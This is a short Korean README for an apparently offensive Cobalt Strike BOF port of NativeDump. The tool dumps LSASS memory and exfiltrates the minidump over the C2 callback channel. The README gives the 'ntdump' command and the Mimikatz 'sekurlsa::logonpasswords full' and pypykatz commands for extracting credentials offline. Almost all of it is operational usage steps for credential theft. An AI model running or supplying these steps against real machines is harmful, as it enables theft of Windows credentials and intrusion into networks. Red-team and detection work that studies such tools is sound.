
메모리에서 LSASS minidump를 생성하고 C2 콜백을 통해 이를 유출하여 Mimikatz 또는 pypykatz로 오프라인 자격 증명을 파싱할 수 있게 해주는 Cobalt Strike BOF입니다.
도구 https://github.com/ricardojoserf/NativeDump의 BOF 포트로, @ricardojoserf가 작성했습니다.
NtDump.cna를 가져온 후 실행하세요:
ntdump <filename>
미니덤프 파일은 메모리에서 생성된 후 CALLBACK_FILE 및 CALLBACK_FILE_WRITE를 사용하여 다운로드됩니다. 다운로드가 완료되면 파일은 View -> Download에서 볼 수 있습니다.
이후 Mimikatz를 사용하여 파싱할 수 있습니다.
mimikatz # sekurlsa::minidump <file path to downloaded minidump file>
mimikatz # sekurlsa::logonpasswords full
또는 pypykatz
pypykatz lsa minidump <file path to downloaded minidump file>